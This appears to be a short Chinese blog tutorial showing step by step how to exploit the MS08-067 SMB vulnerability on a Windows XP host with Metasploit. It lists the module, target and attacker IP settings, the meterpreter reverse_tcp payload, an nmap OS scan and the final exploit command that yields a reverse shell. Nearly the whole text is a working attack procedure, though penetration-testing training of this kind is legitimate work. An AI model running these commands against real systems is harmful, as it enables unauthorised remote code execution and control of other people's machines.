Metasploit之远程代码执行
本次漏洞利用的是ms08-067的XP漏洞
metasploit下进行操作
search 08-067 -->搜索漏洞相关的模块,得到exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi -->使用这个漏洞模块
show options -->查看设置选项
set RHOST 192.168.2.149 -->设置我们的攻击目标192.168.2.149
show payloads -->查看载荷
set payload windows/meterpreter/reverse_tcp -->使用这个载荷
show options -->查看配置选项
set LHOST -->设置攻击者的IP,这里我的设置:set LHOST 192.168.2.146
info -->查看该漏洞可以利用的针对系统,或者命令:show targets
nmap -O 192.168.2.149 -->扫描查看我们的目标主机的信息,得:Microsoft Windows XP SP3
show target id -->知道对应的系统版本就直接设置,这里的“id”应该是对应的数字
show options -->设置好以后的最后一遍检查
exploit -->执行攻击,若成功攻击即可得到meterpreter的反弹shell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论